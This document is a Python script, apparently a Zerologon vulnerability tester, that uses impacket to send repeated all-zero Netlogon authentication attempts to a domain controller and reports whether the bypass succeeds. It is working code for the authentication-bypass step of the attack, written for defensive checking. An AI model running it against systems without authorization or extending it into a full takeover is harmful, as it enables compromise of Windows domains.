#!/usr/bin/env python3 from impacket.dcerpc.v5 import nrpc, epm from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5 import transport from impacket import crypto import hmac, hashlib, struct, sys, socket, time from binascii import hexlify, unhexlify from subprocess import check_call # Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average. MAX_ATTEMPTS = 2000 # False negative chance: 0.04% def fail(msg): print(msg, file=sys.stderr) print('This might have been caused by invalid arguments or network issues.', file=sys.stderr) sys.exit(2) def try_zero_authenticate(dc_handle, dc_ip, target_computer): # Connect to the DC's Netlogon service. binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp') rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc() rpc_con.connect() rpc_con.bind(nrpc.MSRPC_UUID_NRPC) # Use an all-zero challenge and credential. plaintext = b'\x00' * 8 ciphertext = b'\x00' * 8 # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. flags = 0x212fffff # Send challenge and authentication request. nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext) try: server_auth = nrpc.hNetrServerAuthenticate3( rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, target_computer + '\x00', ciphertext, flags ) # It worked! assert server_auth['ErrorCode'] == 0 return rpc_con except nrpc.DCERPCSessionError as ex: # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working. if ex.get_error_code() == 0xc0000022: return None else: fail(f'Unexpected error code from DC: {ex.get_error_code()}.') except BaseException as ex: fail(f'Unexpected error: {ex}.') def perform_attack(dc_handle, dc_ip, target_computer): # Keep authenticating until succesfull. Expected average number of attempts needed: 256. print('Performing authentication attempts...') rpc_con = None for attempt in range(0, MAX_ATTEMPTS): rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer) if not rpc_con: print('=', end='', flush=True) else: break if rpc_con: print('\nSuccess! DC can be fully compromised by a Zerologon attack.') else: print('\nAttack failed. Target is probably patched.') sys.exit(1) if __name__ == '__main__': if not (3 <= len(sys.argv) <= 4): print('Usage: zerologon_tester.py \n') print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.') print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.') sys.exit(1) else: [_, dc_name, dc_ip] = sys.argv dc_name = dc_name.rstrip('$') perform_attack('\\\\' + dc_name, dc_ip, dc_name)